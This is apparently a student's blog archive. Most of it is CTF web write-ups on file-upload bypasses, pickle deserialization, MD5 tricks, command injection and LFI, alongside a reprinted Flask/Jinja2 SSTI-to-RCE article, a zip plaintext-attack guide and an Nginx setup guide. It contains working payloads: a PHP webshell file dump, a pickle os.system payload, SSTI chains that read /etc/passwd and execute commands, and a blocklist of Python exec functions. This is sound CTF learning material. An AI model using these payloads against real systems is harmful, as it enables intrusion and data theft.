2018-04-14 HITBCTF web

web

upload

首先进网站

F12大法

看到有一个网站

进去之后发现会显示图片的长和宽

可以想一下这个php函数是getimagesize
我查看了一下php.net里面介绍,他检查的是文件头
而且可以通过RFI,远程请求,但是一直不行

看了一下title,what’s path 就想着去找路径
然后我想了一下就想着upload的文件夹
发现有default的图片
就在upload上找自己上传的php。。
陷入死胡同了

之后辉神跟我说这个是windows下的有windows的特性
就是 < = * ; > = ?
用通配符可以看是否访问到网站,之后就可以看到上传到网站的文件夹

#!/usr/bin/env python
import requests
import string

secret = string.ascii_letters + string.digits
a = ''
s = requests.session()
for i in range(39):
    for j in secret:
        url = 'http://47.90.97.18:9999/pic.php?filename=../{}</1523537992.jpg'.format(a+j)
        html = s.get(url)
        if html.content != 'image error':
            a=a+j
            print a

用这个代码可以就爬出了他的文件夹/87194f13726af7ceE27bA2cfE97b60df/
上传了一下就可以访问这下用windows下的特性

1.windows大小写都可以被解析,上传Php
2..php::$DATA这也是一个漏洞
3.%99 在bp下改88——99会解析错误

就可以上传上去了

反弹shell什么的都被禁止了

POST /87194f13726af7ceE27bA2cfE97b60df/1523539229.php HTTP/1.1
Host: 47.90.97.18:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://47.90.97.18:9999/87194f13726af7ceE27bA2cfE97b60df/1523539229.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

c=foreach%20(glob(
"../*")%20as%20%24filename)%20%7B%20echo%20"%24filename%20%3D>%20"%3B
var_dump(file_get_contents(%24filename))%3B%20%7D;
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.6.35
Date: Sat, 14 Apr 2018 03:35:40 GMT
Connection: close
Content-Length: 1542

 ../87194f13726af7cee27ba2cfe97b60df => bool(false)
../admin => bool(false)
../flag.php => string(73) "<?php
echo "flag is here";
//HITB{e5f476c1e4c6dc66278db95f0b5a228a}
?>"
../index.html => string(292) "<head>
 <title>Where Path~?</title>
</head>
    <form action="upload.php" method="post" enctype="multipart/form-data">  
        <input type="file" name="file" value="up"/>  
        <input type="submit" value="upload" name="submit" />  
    </form>  
    <!--pic.php?filename=default.jpg-->"
../pic.php => string(219) "<?php
$path="./87194f13726af7cee27ba2cfe97b60df/";
if(list($width, $height) = @getimagesize($path.$_GET['filename'])){
    echo "width=$width</br>";
    echo "height=$height";
}else {
    echo "image error";
}
?>
"
../system => bool(false)
../upfile => bool(false)
../upload => bool(false)
../upload.php => string(685) "<?php

$BlackList = array('asp','php','jsp','php5','asa','aspx','cer','cgi','phtml','ashx','asmx');
$name = $_FILES['file']['name'];
$extension = substr(strrchr($name,"."),1);
$boo = false; 
$filepath=dirname(__FILE__).'/87194f13726af7cee27ba2cfe97b60df/' ;
if (isset($_POST["submit"])){
    foreach ($BlackList as $key=>$value){  
        if ($value==$extension){
            $boo=true;  
            break;  
            }  
        } 
     if(!$boo){
        $size=$_FILES['file']['size'];  
        $tmp=$_FILES['file']['tmp_name'];
        $time=intval(time());
        $name=$time.'.'.$extension;
        move_uploaded_file($tmp,$filepath.$name); 
        echo $name;  
            }else {  
        echo "no no no...";  
            }  
              
        }  
    
?>"

看到了

python revenge

这道题有源码先下载下来审计一波
有一个cPickle的库,和一个黑名单,那我猜应该是拿shell
cpickle就是反序列化漏洞
上网找了一下反序列化的代码

class Person(object):
    def __init__(self,username,password):
        self.username = username 
        self.password = password 
    def __reduce__(self):
        return (os.system, ('whoami',))
admin = Person('admin','admin')
print '序列化: \n' + cPickle.dumps(admin)
d=cPickle.dumps(admin)
print '命令执行结果:\n'
cPickle.loads(d)

但是这个反序列化漏洞得绕过两个加密
有一个4长度的secret不过可以爆破随便拿一个下来

import itertools,string,hashlib
_string='e041bddb6cc524e63d7de234f81a252ed1e39ba52a175ee51af6f279a3b7a0b3!VnNkYWZhZHNmc2FkZnNhCnAwCi4='
def break_cookie():
    (hash, msg) = _string.split("!")
    for c in itertools.product(string.ascii_letters + string.digits, repeat=4):
        if hashlib.sha256("%s%s" % (msg, "".join(c))).hexdigest() == hash:
            print("".join(c))

break_cookie()

可以跑出来他的密码是

有这个就很简单了

然后看了一下黑名单

black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]

没有过滤input()函数
这里的话
在python2中的input函数跟python3不一样,在python2中的input是eval(raw_input())
有密文了就很简单了=。=可是我一直报错。。。。

 

2018-03-27 强网杯和安恒杯题目总结

经过了两天和小伙伴们的熬夜奋战和艰苦奋斗我们终于

强网杯

web签到

md5第一关

这道题主要是md5的各种绕过首先就是第一题空数组就可以绕过了
param1[]=sdfasdf&param2[]=asdfasdf
所得到的值都是0的md5值所以相等

md5第二关

s878926199a,s155964671a的md5值都是0e开头然后
param1[]=s878926199a&m2[]=s155964671a就好了

md5第三关

if((string)$_GET[‘param1’]!==(string)$_GET[‘param2’] && md5($_GET[‘param1’])===md5($_GET[‘param2’]))
{ die(“success!”);}

找到两个MD5值一样的字符串
https://www.mscs.dal.ca/~selinger/md5collision/
脚本我放博客了,主要按这个来就行

welcome

bmp
offset=20 发现端倪
offset=100:

QWB{W3lc0me}

three hint

这道题先是注册一个age,age一定要是数字型的,

我就想起我最近看过的一道关于二次注入的题目,

猜测他用的php语句是is_number

一直找不到回显=。=其实早就有回显绝望

将语句改成16进制输入到里面就可以得到flag

安恒杯

ping

首先是ping一个服务器,就可以想到一个命令行的执行

就是加上一个%0a 代表着一个换行符

%0a加上ls 就可以读取当前目录下的文件

看到还有一个update,之后就是一个文件上传漏洞中间有一个伪随机数

mt_rand,但是现在已经有一只漏洞


>[http://download.openwall.net/pub/projects/php_mt_seed/php_mt_seed-3.2.tar.gz](http://download.openwall.net/pub/projects/php_mt_seed/php_mt_seed-3.2.tar.gz)

主要看这个可以下载

就可以找到自己上传的文件执行一句话木马

一直使用%00截断但是找不到那个文件夹

上网查了一下Apache文件解析漏洞

Apache会从文件的最后一个后缀开始解析直到找到认识的就会停止解析,

所以只要构造一个上传文件.php.jpg就可以了

最后我恶作剧了一下=。=

image

还有一题我忘了叫啥

web 100分

主要是lfi漏洞,文件任意读取

需要学习的是Apache的目录=。=看来我要背一背来了

/etc/httpd/conf/httpd.conf 配置文件路径

HGAME正赛writeup

#闲扯一句

这次的HGAME我收获挺大的,认识了好多大佬,

当然也感谢大佬们抬手让了我拿了第一(1000块~),

当然我觉得最主要的原因是性感出题人hammer在线解题,

让我做出来了,真滴非常感谢

这次的比赛学到了很多,让我慢慢想一想

已经过去3天了。题目都关了,我只能想着写writeup。。

#web1

LFI RCE

首先是web1,web1一开始就一个界面看着很像我周末N1ctf做的题目

界面的是index.php,然后我看到登录框和密码框就一直想着用sql中注入来登录,

后来出题的Alias给了我们hint 是LFI,我用了burpsuite抓包发现有一个login,我居然

以为LFI在这里。。然后做不出来了。

直到最后一小时,我做不了别的题目了,开始私聊出题人=。=

出题人真的是非常有意思,开始跟我讲你刚刚进去一个网站,

发现登录框了,你先要干嘛,我想了想毫不犹豫的说sql注入了!

现在想想=。=当然是先注册了,就登陆了registe.php,发现可以注册

注册完之后登录主页面,然后我就看到了LFI的入口,

用php的伪协议可以读取所有的源代码

php://filter/read=convert.base64-encode/resource=upload.php

还好我源代码保存了

继续阅读“HGAME正赛writeup”

HGAME——WEEK4

#前言

突然发现我的week4的writeup没有写,还好我的word(现在发现只有一部分-,-所以有一点图片不好意思。。)

还在-,-于是补补上,明天写一下正赛的writeup

如果我还找的出来的话=。=,web只能说一说,misc还是有文件的=。=

#正经地方

Web

散落的flag(请求头?)

一开始做的时候真的没头脑=。=只能做出第一个三分之一部分

继续阅读“HGAME——WEEK4”

2018-03-19 杭电所有课程爬取的代码 python

一天毛钊岚=。=想让我把杭电所有的课程爬下来,于是经过一天的构思和一天的查资料还是完成了=。=嘻嘻嘻嘻

正在爬取=。=

我所使用的是selenium和re 模块就够了,正好锻炼我re的能力

因为在爬取的时候我发现并不能用request,杭电官网的加载是用JavaScript来做请求的,发现request并不能一键爬取于是上网查找了selemium的资料写出来了=。=

下面是代码=。=,还有就是chromedriver一定要和Chrome的版本对应不然是不能实现的

 

import re
from selenium import webdriver
import time,os

url='http://jxgl.hdu.edu.cn/jxrwcx.aspx'
file=open('kechengmingchen.txt','w')

def openwindow():
    driver = webdriver.Chrome(executable_path='C:\\Users\\assu\\PycharmProjects\\CTF\\学校课程\\chromedriver.exe')
    # driver.maximize_window()
    driver.get(url)
    for i in range(1,50000):
        yemian,yeshu=tiqu(driver.page_source)
        print("第{}页".format(yeshu[0]))
        # print(len(yemian),yemian,sep='\n')
        for j in range(1,len(yemian)):
            file.write(yemian[j][1]+'\n')
        time.sleep(1)
        if i <11:
            xpath='//*[@id="DBGrid"]/tbody/tr[16]/td/a[{}]'.format(i)
        else:
            if i%10==0:
                xpath = '//*[@id="DBGrid"]/tbody/tr[16]/td/a[{}]'.format(11)
            else:
                xpath = '//*[@id="DBGrid"]/tbody/tr[16]/td/a[{}]'.format(i%10+1)
        try:
            select=driver.find_element_by_xpath(xpath=xpath)
            print("要按的页数"+select.text)
            select.click()
        except:
            if yeshu==i+1:
                continue
            print("最后一页为第{}页".format(yeshu[0]))
            break

def tiqu(text):
    regax='<td>(.*?)</td><td>(.*?)</td><td>(.*?)</td><td>(.*?)</td><td>(.*?)</td><td>(.*?)</td><td>(.*?)</td><td>(.*?)</td><td>(.*?)</td>'
    all_re=re.findall(regax,text)
    reg='<span>(.*?)</span>'
    arr_1=re.findall(reg,text)
    return all_re,arr_1

openwindow()
file.close()

全部44行=。=还是挺简单的呢

 

结果是这样的=。=

当然如果你要加更多的话也是可以的,看下代码你就知道了=。=
杭电的反爬真的差=。=

后来跟o爷爷聊了一下杭电的所有课程爬取

他也给了我一份代码,他没有用selenium比我的快很多。

比较推荐他的,嘻嘻嘻嘻嘻

import random
import re
import time

import requests
from bs4 import BeautifulSoup

session = requests.Session()
r = requests.get(url)
soup = BeautifulSoup(r.content, "html5lib")

semester = input('第几学期? ')

if semester == '2':
 r = requests.post(
 url,
 data={
 'ddlXY': None, 'ddlJS': None, 'kcmc': None, 'ddlXN': '2017-2018',
 'ddlXQ': semester, 'DropDownList1': 'kcmc', 'TextBox1': None,
 '__LASTFOCUS': None, '__EVENTARGUMENT': None,
 '__EVENTTARGET': 'DBGrid$ctl18$ctl01',
 '__VIEWSTATE': soup.find(id='__VIEWSTATE')['value'],
 '__EVENTVALIDATION': soup.find(id='__EVENTVALIDATION')['value'],
 })
 soup = BeautifulSoup(r.content, "html5lib")

f = open('semester%s.csv' % semester, 'w')
f.write('''"开课状态","课程名称","学分","考核方式","课程性质","任课教师",\
"选课课号","起止周","上课时间","上课地点","开课学院","合班信息"\n''')

first_ten_page = True
first_page = True
page = 1 if semester == '1' else 0
total = 1 if semester == '1' else 0

try:
 while True:
 trs = soup.find('table', id='DBGrid').find_all('tr')[1:-1]
 for tr in trs:
 tds = list(tr.children)[1:-1]
 if first_page and semester == '2':
 print('Changing to semester 2...')
 break
 else:
 f.write('"' + '","'.join([i.text for i in tds]) + '"\n')
 print('[%3d] Got: %s' % (total, tds[1].text))
 total += 1

r = requests.post(
 url,
 data={
 'ddlXY': None, 'ddlJS': None, 'kcmc': None, 'ddlXN': '2017-2018',
 'ddlXQ': semester, 'DropDownList1': 'kcmc', 'TextBox1': None,
 '__LASTFOCUS': None, '__EVENTARGUMENT': None,
 '__EVENTTARGET': 'DBGrid$ctl18$ctl%02d'%page,
 '__VIEWSTATE': soup.find(id='__VIEWSTATE')['value'],
 '__EVENTVALIDATION': soup.find(id='__EVENTVALIDATION')['value'],
 },
 )
 soup = BeautifulSoup(r.content, "html5lib")
 time.sleep(1)
 if (page == 10 and first_ten_page) or page == 11:
 page = 2
 first_ten_page = False
 else:
 page += 1
 first_page = False
 f.flush()

except KeyboardInterrupt as e:
 f.close()
 print("exit now")

HGAME——week3

week3-ckj123

Web

正常的SQL

 

这道题我首先看请求头,发现有一个base64编码的然后解码之后发现刚刚好是hello之后的东西,而且是在cookie中,上网查了一下sql注入居然还有cookie注入这种操作,然后就是sqlmap一番神操作就有了-,-时间盲注真的花了一下午的时间,我觉得主要是要用上插件那个base64encode.py的插件,然后一步步下去就可以了

 

安全到手        

送分的SQL

 

打开sqlmap神器发现可以用4种注入方式然后一步一步跑下来就可以了,拿到flag

 

 

Ngcs blog

 

这道题其实很简单我的payload是

</h1> {{ ”.__class__.__mro__[2].__subclasses__()[40](‘./flag’).read() }},

然鹅我一直做不出的原因看来是我没有读过这篇文章

探索Flask/Jinja2中的服务端模版注入

继续阅读“HGAME——week3”

明文攻击打开zip压缩包

该条件实现的情况是你有该压缩包和该压缩包底下的一个文件

本文讲述如何利用“Advanced Archive Password Recovery”这个工具破解加密的zip文档。需要注意的是,你必须拥有加密zip文件中的某一个“加密的原文件”。

本文以破解 source.zip 为例,source.zip 为加密过的文件,我们拥有其中的原文件 GOODSITE.txt 。

zip加密文件

先将 GOODSITE.txt 压缩成未加密的zip文件,压缩后的文件大小要比加密文件中的要小,如果比加密文件中的大,则说明压缩的方式不对,如存储、最佳、极限压缩等,我们必须以和加密zip文件相同的压缩方式压缩,可以多加尝试。下图为两个压缩包同一文件压缩后的大小对比。

压缩后文件大小对比

打开Advanced Archive Password Recovery,点击左上方的打开选择加密zip文件(这里为source.zip),攻击类型选择明文,下方也切换到明文选项卡,在明文文件路径处,选择我们自己压缩的 GOODSITE.zip。

明文攻击

然后点击开始,如果你得到下面的提示,则证明你的压缩方式不正确。

提示没有匹配的文件

当正确压缩后,不到10秒的时间就破解了。

加密的zip文件密码已被破解

在明文攻击的下方,提示密码必须小于9位,如果你点击开始后很长时间都无法破解,那么可能是加密的密码过长。

如果没有加密文件中的原文件,可以尝试暴力破解,攻击类型选择暴力,然后选择范围、长度等,当然这所需要的时间和密码的复杂度、机器的配置是息息相关的。

探索Flask/Jinja2中的服务端模版注入

来自: http://www.freebuf.com/articles/web/98928.html

在探索Flask/Jinja2中的服务端模版注入Part1中,我最初的目标是找到文件的路径或者说是进行文件系统访问。之前还无法达成这些目标,但是感谢朋友们在之前文章中的反馈,现在我已经能够实现这些目标了。本文就来讲讲进一步研究获得的结果。

神助攻

对于之前的文章,感谢 Nicolas G 对我们的帮助

如果你有玩玩这个payload,你很快就会清楚这是行不通的。这里有有几个比较合理的解释,之后我会简短给大家说说。关键是这个payload使用了多个之前我们忽略了但非常重要的内省实用程序: __mro__ 以及 __subclasses__ 属性

免喷申明:以下的解释可能会存在些许生涩,我实在没兴趣把自己搞的非常精通啥的,就这水平了。大多数时候我在解决框架/语言中存在的模糊不清的部分,我都会尝试看是否能够带给我预期的效果,但我一直不知道会产生这种效果的缘由。我依旧在学习这些属性背后隐藏着的“为什么”,但我至少想将我知道的分享给大家!

__mro__ 中的MRO(Method Resolution Order)代表着解析方法调用的顺序,可以看看 Python文档 中的介绍。它是每个对象元类的一个隐藏属性,当进行内省时会忽略 dir 输出(see Objects/object.c at line 1812 )

__subclasses__ 属性在这里作为一种方法被 定义 为,对每个new-style class“为它的直接子类维持一个弱引用列表”,之后“返回一个包含所有存活引用的列表”。

简单来说, __mro__ 允许我们在当前Python环境中追溯对象继承树,之后 __subclasses__ 又让我们回到原点。从一个new-style object开始,例如 str 类型。使用 __mro__ 我们可以从继承树爬到根对象类,之后在Python环境中使用 __subclasses__ 爬向每一个new-style object。ok,这让我们能够访问加载到当前Python环境下的所有类,那么我们该怎么利用这一新发现愉快的玩耍呢?

利用

这里我们还要考虑一些东西,Python环境可能会包括:

  • 源于Flask应用的东西
  • 目标应用自定义的一些东西

因为我们是想获得一个通用exploit,所以测试环境越接近原生Flask越好。越向应用中添加库和第三方模块,那我们能获得通用exploit的概率就越低。我们之前进行概念验证时使用的那个应用就是一个非常不错的选择。

为了挖掘出一枚exploit向量,要求不修改目标源代码。在前一篇文章中,为了进行内省,我们向存在漏洞的应用中添加了一些函数,但现在这些统统都不需要了。

首先我们要做的第一件事便是选择一个new-style object用于访问 object 基类。可以简单的使用 ” ,一个空字符串, str 对象类型。之后我们可以使用 __mro__ 属性访问对象的继承类。将 {{ ”.__class__.__mro__ }} 作为payload注入到存在SSTI漏洞的页面中

我们可以看到之前讨论过的元组现在正向我们反馈,由于我们想追溯根对象类,我们利用第二条索引选择 object 类类型。目前我们正位于根对象,可以利用 __subclasses__ 属性dump所有存在于应用程序中的类,将 {{ ”.__class__.__mro__[2].__subclasses__() }} 注入到SSTI漏洞中。

如你所看到的,这里面的信息太多了。在我使用的这个目标App中,这里有572个可访问类。这事情变得有些棘手了,这也是为什么上面推特中提到的payload行不通的原因了。记住,并不是每个应用的Python环境都差不多。我们的目标是找到一个能够让我们访问文件或者操作系统的东西。可能不那么容易在一个应用中找到类似 subprocess.Popen 模块进而获得一枚exploit,例如受前文Twitter上附有的那个payload影响的应用。但是从我的发现来看,没有什么能够比得上原生Flask。幸好,在原生Flask下我们也能够实现类似的效果。

如果你梳理之前payload的输出信息,你应该可以找到 <type ‘file’> 类,它是文件系统访问的关键。虽然 open 是创建文件对象的内置函数, file 类也是有能力列举文件对象的,如果我们能够列举一个文件对象,之后我们可以使用类似 read 方法来提取内容。为了证实这一点,找到 file 类的索引并注入 {{ ”.__class__.__mro__[2].__subclasses__()[40](‘/etc/passwd’).read() }} ,其中的 40 是环境中 <type ‘file’> 类的索引。

主观上我们已经证明了在Flask/Jinja2框架下利用SSTI是能够读取文件的,我们废了这么多时间难道只是这样?今天我的目标是远程代码/命令执行!

在前一篇文章中我引用了 config 对象的几个方法将对象加载到Flask配置环境中。其中一种方法便是 from_pyfile ,以下为 from_pyfile 方法的代码( flask/config.py )

  def from_pyfile(self, filename, silent=False):
        """Updates the values in the config from a Python file.  This function
        behaves as if the file was imported as module with the
        :meth:`from_object` function.

        :param filename: the filename of the config.  This can either be an
                         absolute filename or a filename relative to the
                         root path.
        :param silent: set to `True` if you want silent failure for missing
                       files.

        .. versionadded:: 0.7
           `silent` parameter.
        """
        filename = os.path.join(self.root_path, filename)
        d = imp.new_module('config')
        d.__file__ = filename
        try:
            with open(filename) as config_file:
                exec(compile(config_file.read(), filename, 'exec'), d.__dict__)
        except IOError as e:
            if silent and e.errno in (errno.ENOENT, errno.EISDIR):
                return False
            e.strerror = 'Unable to load configuration file (%s)' % e.strerror
            raise
        self.from_object(d)
        return True

这里有几个非常有趣的东西,最明显的是使用一个文件路径作为 compile 函数的参数。如果我们能够向操作系统写入文件,那么就可以大显身手咯。正如我们刚才讨论的,我们能够做到!利用前面提及的 file 类不仅可以读取文件还可以向目标服务器写入文件。之后我们通过SSTI漏洞调用 from_pyfile 方法编译文件并执行其中内容,这是一个2阶段攻击。首先向SSTI漏洞注入类似 {{ ”.__class__.__mro__[2].__subclasses__()[40](‘/tmp/owned.cfg’, ‘w’).write(‘<malicious code here>”) }} 。之后通过注入 {{ config.from_pyfile(‘/tmp/owned.cfg’) }} 触发编译进程,之后就会执行编译后的代码。远程代码执行完成!

接下来将战果扩大,虽然代码在运行就非常棒了,但每个代码块都必须经过一个多步骤进程。让我们利用 from_pyfile 方法为其预设用途,并向 config 对象添加一些有用的玩意。向SSTI漏洞注入 {{ ”.__class__.__mro__[2].__subclasses__()[40](‘/tmp/owned.cfg’, ‘w’).write(‘from subprocess import check_output\n\nRUNCMD = check_output\n’) }} 。这将向远程服务器写入一个文件,当编译完成为 subprocess 模块引入 check_output 方法,并将其设置指向变量 RUNCMD 。如果你回想一下上一篇文章,你会将其添加到Flask config 对象,用大写字符将其看作为一个属性。

注入 {{ config.from_pyfile(‘/tmp/owned.cfg’) }} ,向 config 对象添加一个新项。注意以下两张图片的不同之处!

现在我们可以调用新的配置项在远程服务器上运行命令了,通过向SSTI漏洞注入 {{ config[‘RUNCMD’](‘/usr/bin/id’,shell=True) }} 即可证明!

远程命令执行完成!

总结

我们不必再去纠结如何逃避Flask/Jinja2框架的模版沙盒,现在就可以得出结论:在Flask/Jinja2环境下SSTI漏洞带来的影响实实在在的存在!

*参考来源: nvisium ,鸢尾编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

Nginx 本地服务器搭建

LEMP环境搭建及配置

安装Nginx

在ubuntu上安装软件很简单,使用apt-get即可。注意由于权限问题,需要在前面加sudo

sudo apt-get update
sudo apt-get install nginx

踩坑提醒

安装Nginx时出现错误

dennis@my-remote-server:~$ sudo apt-get install nginx
Reading package lists... Done
Building dependency tree
Reading state information... Done
nginx is already the newest version (1.10.0-0ubuntu0.16.04.2).
0 upgraded, 0 newly installed, 0 to remove and 42 not upgraded.
2 not fully installed or removed.
After this operation, 0 B of additional disk space will be used.
Do you want to continue? [Y/n]
Setting up nginx-core (1.10.0-0ubuntu0.16.04.2) ...
Job for nginx.service failed because the control process exited with error code. See "systemctl status nginx.service" and "journalctl -xe" for details.
invoke-rc.d: initscript nginx, action "start" failed.
dpkg: error processing package nginx-core (--configure):
 subprocess installed post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of nginx:
 nginx depends on nginx-core (>= 1.10.0-0ubuntu0.16.04.2) | nginx-full (>= 1.10.0-0ubuntu0.16.04.2) | nginx-light (>= 1.10.0-0ubuntu0.16.04.2) | nginx-extras (>= 1.10.0-0ubuntu0.16.04.2); however:
  Package nginx-core is not configured yet.
  Package nginx-full is not installed.
  Package nginx-light is not installed.
  Package nginx-extras is not installed.
 nginx depends on nginx-core (<< 1.10.0-0ubuntu0.16.04.2.1~) | nginx-full (<< 1.10.0-0ubuntu0.16.04.2.1~) | nginx-light (<< 1.10.0-0ubuntu0.16.04.2.1~) | nginx-extras (<< 1.10.0-0ubuntu0.16.04.2.1~); however:
  Package nginx-core is not configured yet.
  Package nginx-full is not installed.
  Package nginx-light is not installed.
  Package nginx-extras is not installed.

dpkg: error processing package nginx (--configure):
 dependency problems - leaving unconfigured
Errors were encountered while processing:
 nginx-core
 nginx
E: Sub-process /usr/bin/dpkg returned an error code (1)
原因分析

Google了一下,发现出现这种错误,一般应该是由于其他应用占用了80端口。可以这样来看下:

dennis@myserver:~$ sudo netstat -nlp
sudo: unable to resolve host myserver
[sudo] password for dennis:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      132/rpcbind
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      332/apache2
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      269/sshd
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      454/master
tcp6       0      0 :::111                  :::*                    LISTEN      132/rpcbind
tcp6       0      0 :::22                   :::*                    LISTEN      269/sshd

果然80端口被默认安装的apache给占掉了,所以需要干掉占用80端口的apache2:

sudo kill -9 332

运行apt-get命令更新或安装软件出现Setting locale failed错误

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
    LANGUAGE = (unset),
    LC_ALL = (unset),
    LC_CTYPE = "en_US.UTF-8",
    LANG = "en_US.UTF-8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
locale: Cannot set LC_CTYPE to default locale: No such file or directory
locale: Cannot set LC_MESSAGES to default locale: No such file or directory
locale: Cannot set LC_ALL to default locale: No such file or directory
解决办法:
sudo ap-get update
apt-get install language-pack-en

Nginx 常用目录

内容

/var/www/html: 保存web网页内容的默认目录

服务器配置

/etc/nginx: nginx 配置目录。所有Nginx相关的配置文件都在这里。
/etc/nginx/nginx.conf: Nginx主配置文件,进行全局默认设置。
/etc/nginx/sites-available: 针对每个”server blocks”独立的配置文件。这里的配置文件并不被直接使用,只有软连接到site-enabled的配置才会真正生效。
/etc/nginx/sites-enabled/: 针对每个”server blocks”独立的配置文件。由sites-available链接过来。
/etc/nginx/snippets: 一些配置脚本片段。

服务器日志

/var/log/nginx/access.log: 默认保存所有与web服务交互的请求。
/var/log/nginx/error.log: Nginx的错误日志

Tips

1. 检测Nginx的配置文件是否有问题:

dennis@my-remote-server:~$ sudo nginx -t -c /etc/nginx/nginx.conf
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

2. 停止apache服务

停掉apache服务的方法有多种,具体参考ubuntu-linux-start-restart-stop-apache-web-server. 较为常用的有:

sudo /etc/init.d/apache2 stop

或者

$ sudo apache2ctl stop

3. 取消apache自启动

在ubuntu中apache可能默认会设置为自启动,也就是说kill了之后又会自己起来。可以通过下面的命令取消自启动:

sudo update-rc.d -f apache2 remove

回复自启动则需要:

sudo update-rc.d apache2 defaults

4. Nginx启动与停止

和apache的启动和停止一样,Nginx的启动和停止服务也有多种方式,常用的有:

//To stop your web server, you can type:
sudo systemctl stop nginx

//To start the web server when it is stopped, type:
sudo systemctl start nginx

//To stop and then start the service again, type:
sudo systemctl restart nginx

//If you are simply making configuration changes, Nginx can often reload without dropping connections. To do this, this command can be used:
sudo systemctl reload nginx

//By default, Nginx is configured to start automatically when the server boots. If this is not what you want, you can disable this behavior by typing:
sudo systemctl disable nginx

//To re-enable the service to start up at boot, you can type:
sudo systemctl enable nginx

或者

sudo /etc/init.d/nginx restart
sudo service nginx restart

5. 查看本机ip地址

ip addr show venet0 | grep inet | awk '{ print $2; }' | sed 's/\/.*$//'

其中venet0可能为eth0,可以通过ip addr 或者ifconfig看下。

或者可以这样:

dennis@my-remote-server:/$ curl http://icanhazip.com
xxx.xxx.xxx.xxx

6. 检查Nginx的状态:

    ```bash
    dennis@my-remote-server:/var/www$ sudo systemctl status nginx
    ● nginx.service - A high performance web server and a reverse proxy server
       Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
       Active: active (running) since Wed 2016-08-17 14:39:33 CST; 2h 43min ago
     Main PID: 5221 (nginx)
       CGroup: /system.slice/nginx.service
               ├─ 5221 nginx: master process /usr/sbin/nginx -g daemon on; master_process on
               ├─15622 nginx: worker process
               └─15623 nginx: worker process
    
    Aug 17 14:39:33 my-remote-server systemd[1]: Stopped A high performance web server and a reverse proxy server.
    Aug 17 14:39:33 my-remote-server systemd[1]: Starting A high performance web server and a reverse proxy server...
    Aug 17 14:39:33 my-remote-server systemd[1]: nginx.service: Failed to read PID from file /run/nginx.pid: Invalid argument
    Aug 17 14:39:33 my-remote-server systemd[1]: Started A high performance web server and a reverse proxy server.
    Aug 17 15:52:19 my-remote-server systemd[1]: Reloading A high performance web server and a reverse proxy server.
    Aug 17 15:52:19 my-remote-server systemd[1]: Reloaded A high performance web server and a reverse proxy server.
    Aug 17 16:34:05 my-remote-server systemd[1]: Reloading A high performance web server and a reverse proxy server.
    Aug 17 16:34:05 my-remote-server systemd[1]: Reloaded A high performance web server and a reverse proxy server.
    ```

安装MySQL

安装

sudo apt-get update
sudo apt-get install mysql-server

配置

sudo mysql_secure_installation

查看MySQL的版本:

mysql --version

初始化

在5.7.6以前的版本:

sudo mysql_install_db

5.7.6及之后的版本:

sudo mysqld --initialize

如果是如上面那样通过apt-get安装的,这一步通常已经被做了。因此会有如下错误提示:

 [ERROR] --initialize specified but the data directory has files in it. Aborting.

MySQL的启动和停止

sudo /etc/init.d/mysql start
sudo /etc/init.d/mysql stop
sudo /etc/init.d/mysql restart

或者:

sudo start mysql
sudo stop mysql
sudo restart mysql

这种方式使用了“upstart” (其实就是/etc/init.d/mysql的软连接)。

测试连接

可以通过mysqladmin -p -u root version命令来测试一下mysql连接是否正常。

dennis@my-remote-server:/var/www/html$ mysqladmin -p -u root version
Enter password:
mysqladmin  Ver 8.42 Distrib 5.7.13, for Linux on x86_64
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Server version      5.7.13-0ubuntu0.16.04.2
Protocol version    10
Connection      Localhost via UNIX socket
UNIX socket     /var/run/mysqld/mysqld.sock
Uptime:         19 min 14 sec

Threads: 1  Questions: 8  Slow queries: 0  Opens: 115  Flush tables: 1  Open tables: 34  Queries per second avg: 0.006

安装PHP

sudo apt-get -y install php7.0-fpm php7.0-mysql

配置PHP设置

sudo vim /etc/php/7.0/fpm/php.ini

